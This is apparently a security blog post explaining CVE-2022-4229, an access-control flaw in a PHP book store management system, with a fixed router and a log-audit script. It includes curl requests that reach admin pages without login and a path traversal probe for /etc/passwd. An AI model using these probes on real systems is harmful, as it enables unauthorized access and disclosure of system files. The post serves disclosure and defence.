CVE-2022-4229 - Critical Improper Access Control in SourceCodester Book Store Management System 1. — A Deep Dive

A critical security flaw, CVE-2022-4229, has been discovered in SourceCodester Book Store Management System 1. (BSMS). This issue, tracked as VDB-214588, allows remote attackers to bypass access controls and potentially gain unauthorized access to privileged parts of the application. In this long-read post, we’ll take an exclusive, simplified look at what happened, what’s at risk, how the exploit works, and how you can protect your systems.

What Is SourceCodester Book Store Management System?

SourceCodester’s Book Store Management System is a popular open-source project. Small businesses and developers use it to digitize and automate book inventory, sales, and staff management. Like many similar PHP-based CRUD (Create, Read, Update, Delete) apps, it typically holds sensitive inventory and customer data, so its access control matters.

The Vulnerability: Improper Access Controls

CVE-2022-4229 stems from improper access controls implemented in the application's main entry file, /bsms_ci/index.php. In non-technical terms, this means that the system fails to correctly check if a user is authorized to access or modify certain resources.

- Attack vector: Remote (no physical or local access required)
- Vulnerable file: /bsms_ci/index.php
- Impact: Unauthorized access to privileged functions, potentially full account takeover or sensitive data exposure.

Technical Details

Usually, web apps protect sensitive actions or admin areas by checking user authentication and roles. In BSMS 1., this check is either missing, misconfigured, or can be easily bypassed with direct requests.

Consider a simplified snippet representing an insecure access control check in index.php:

```php
// Example pseudo-vulnerable code
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include $page . ".php";
}
```

Instead of checking whether the requested $page should be available only to authenticated or admin users, the script includes whatever file name arrives in the page URL parameter. Depending on what that parameter selects, this unchecked pattern is classed as an Insecure Direct Object Reference (IDOR) or, when it accepts arbitrary file paths, Local File Inclusion (LFI); either way, attackers can load sensitive files or reach restricted features.

1. Access the application in a browser or via a tool like cURL, without logging in.

2. Send requests with crafted page parameters to probe for administrative functionality, for example:

```
http://your-bsms-app/bsms_ci/index.php?page=admin_dashboard
```

3. If there’s no access authentication or role verification, the server blindly includes and processes the admin_dashboard.php script. Now, the attacker can interact with admin features.

Real-World Exploit Example (cURL)

```sh
curl "http://target-site/bsms_ci/index.php?page=admin_dashboard"
```

If the page loads, you have confirmed improper access control.

Let’s imagine the attacker finds user and sales management features like so:

```sh
# Access User Management without login
curl "http://target-site/bsms_ci/index.php?page=user_management"

# Access Sales without login
curl "http://target-site/bsms_ci/index.php?page=sales"

# Even try reading files
curl "http://target-site/bsms_ci/index.php?page=../../../../etc/passwd"
```

Depending on the configuration, this could even lead to File Inclusion vulnerabilities, letting attackers read local files.

References

- Vulnerability Database: VDB-214588  
- NVD: CVE-2022-4229 Record  
- Original Exploit Disclosure – Useful to see how the system is structured.

- Site Defacement or Sabotage: Change, delete, or manipulate system data at will.

- Wider Attacks: If File Inclusion is possible, attackers may run arbitrary code or steal system files.


## How To Fix / Mitigate

1. Patch Now: Check the vendor site for an official fix. If unavailable, limit access to the application until fixed.
2. Implement Proper Access Controls: Always check user authentication and authorization before including or executing sensitive files.

```php
// Session key names ('user_id', 'role') are assumed; the original fragment shows only the deny branch.
if (empty($_SESSION['user_id']) || ($_SESSION['role'] ?? '') !== 'admin') {
    die("Unauthorized access!");
}
```
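The deny check above still leaves the `include $page . ".php"` pattern in place. A more complete fix is to stop letting the request name a file at all. The following is an added example, not code from BSMS or from this post: an allow-list router for index.php in which each page name maps to a fixed view file and the role needed to see it, and anything not in the list is refused before the filesystem is touched. The page names, the `views/` directory, and the session keys `user_id` and `role` are assumptions for the example; it targets PHP 8 or later.

```php
<?php
// Added example, not BSMS project code: an allow-list router that replaces
// `include $page . ".php"`. Each page name maps to a view file and the role
// required to see it; a name not in the list is rejected outright, so user
// input never selects a file path. The session keys 'user_id' and 'role' and
// the views/ directory are assumptions for this example.
declare(strict_types=1);

const PAGES = [
    'home'            => ['file' => 'home.php',            'role' => null],    // public
    'sales'           => ['file' => 'sales.php',           'role' => 'staff'],
    'user_management' => ['file' => 'user_management.php', 'role' => 'admin'],
    'admin_dashboard' => ['file' => 'admin_dashboard.php', 'role' => 'admin'],
];
const ROLE_RANK = ['staff' => 1, 'admin' => 2];

/**
 * Decide whether $page may be served to a session holding $sessionRole.
 * Returns ['status' => int, 'file' => ?string]; 'file' is set only on 200.
 */
function resolve_page(?string $page, ?string $sessionRole, string $viewDir): array
{
    // Unknown page: fail closed before touching the filesystem.
    if ($page === null || !array_key_exists($page, PAGES)) {
        return ['status' => 404, 'file' => null];
    }
    $required = PAGES[$page]['role'];
    if ($required !== null) {
        if ($sessionRole === null) {
            return ['status' => 401, 'file' => null];   // not logged in
        }
        if ((ROLE_RANK[$sessionRole] ?? 0) < ROLE_RANK[$required]) {
            return ['status' => 403, 'file' => null];   // logged in, insufficient role
        }
    }
    return ['status' => 200, 'file' => $viewDir . '/' . PAGES[$page]['file']];
}

session_start();
// Only accept a scalar string; an array-valued page[] parameter is ignored.
$requested = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : 'home';
$role      = !empty($_SESSION['user_id']) && is_string($_SESSION['role'] ?? null)
           ? $_SESSION['role'] : null;

$result = resolve_page($requested, $role, __DIR__ . '/views');
if ($result['file'] === null) {
    http_response_code($result['status']);
    exit('Unauthorized access!');
}
require $result['file'];
```

With this structure a request for `?page=../../../../etc/passwd` or `?page=%2e%2e%2f...` never reaches `require`, because the decoded value is simply not a key in `PAGES`; the authorization decision and the file selection are made from server-side data only, and the response code distinguishes "no such page" from "log in first" from "wrong role", which makes the behaviour easy to test.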

Conclusion

CVE-2022-4229 is a textbook example of why access control and code hygiene matter in PHP web apps. If you run SourceCodester BSMS or similar apps, review your access control logic and regularly update your software.

For more details or help, check out the official VDB-214588 page and watch for patches or community fixes.

Stay Secure! 🔒

*If you have this system online, please patch immediately and audit your logs for suspicious activity.*
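To support the log audit suggested above, here is an added example (not part of this post) that scans Apache/nginx combined-format access log lines for the two request shapes described in the post: a `page=` value containing path traversal, URL-encoded or not, and a privileged page name requested by a client address that never issued a login POST earlier in the log. The privileged page names, the login path, and the sample log lines are all constructed assumptions for the example; it requires PHP 8 for `str_contains` and `str_starts_with`.

```php
<?php
// Added example, not from the post: flag suspicious page= requests in a
// combined-format access log. PRIVILEGED_PAGES and LOGIN_PATH are assumed
// values; adjust them to the real application's page names and login route.
declare(strict_types=1);

const PRIVILEGED_PAGES = ['admin_dashboard', 'user_management', 'sales'];
const LOGIN_PATH = '/bsms_ci/index.php?page=login';

// Constructed sample lines, not real traffic.
const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [30/Nov/2022:12:00:01 +0000] "POST /bsms_ci/index.php?page=login HTTP/1.1" 302 0
10.0.0.5 - - [30/Nov/2022:12:00:02 +0000] "GET /bsms_ci/index.php?page=sales HTTP/1.1" 200 5120
203.0.113.9 - - [30/Nov/2022:12:05:44 +0000] "GET /bsms_ci/index.php?page=admin_dashboard HTTP/1.1" 200 8811
203.0.113.9 - - [30/Nov/2022:12:05:45 +0000] "GET /bsms_ci/index.php?page=../../../../etc/passwd HTTP/1.1" 200 2007
203.0.113.9 - - [30/Nov/2022:12:05:46 +0000] "GET /bsms_ci/index.php?page=%2e%2e%2f%2e%2e%2fconfig HTTP/1.1" 500 0
198.51.100.2 - - [30/Nov/2022:12:09:00 +0000] "GET /bsms_ci/index.php?page=home HTTP/1.1" 200 1200
LOG;

/** Parse one combined-log line into ip, method, path and status, or null if malformed. */
function parse_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'path' => $m[3], 'status' => (int) $m[4]];
}

/** Extract the page= query value, URL-decoded, or null if absent. */
function page_param(string $path): ?string
{
    $query = parse_url($path, PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    parse_str($query, $params);   // decodes %2e%2e%2f to ../ as a side effect
    return isset($params['page']) && is_string($params['page']) ? $params['page'] : null;
}

/** Return a list of [ip, reason, path] findings for the whole log text. */
function audit_log(string $log): array
{
    $loggedIn = [];   // client addresses that posted to the login path earlier in the log
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parse_line($line);
        if ($r === null) {
            continue;
        }
        if ($r['method'] === 'POST' && str_starts_with($r['path'], LOGIN_PATH)) {
            $loggedIn[$r['ip']] = true;
            continue;
        }
        $page = page_param($r['path']);
        if ($page === null) {
            continue;
        }
        // One check covers plain and percent-encoded traversal because parse_str decoded it.
        if (str_contains($page, '..')) {
            $findings[] = [$r['ip'], 'path traversal in page parameter', $r['path']];
        } elseif (in_array($page, PRIVILEGED_PAGES, true) && !isset($loggedIn[$r['ip']])) {
            $findings[] = [$r['ip'], 'privileged page without prior login', $r['path']];
        }
    }
    return $findings;
}

foreach (audit_log(SAMPLE_LOG) as [$ip, $reason, $path]) {
    printf("%-15s %-40s %s\n", $ip, $reason, $path);
}
```

On the constructed sample the scan reports three findings, all from 203.0.113.9: the admin_dashboard request with no prior login, and the two traversal attempts. The 10.0.0.5 request for sales is not reported because a login POST from that address precedes it. Access logs cannot show whether a session was actually valid, so treat the "without prior login" rule as a triage signal to correlate with the application's own session or login records rather than as proof of compromise; a 200 status on a traversal line, as in the sample, is the stronger indicator that the include actually succeeded.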

Timeline

Published on: 11/30/2022 12:15:00 UTC
Last modified on: 01/09/2023 17:04:00 UTC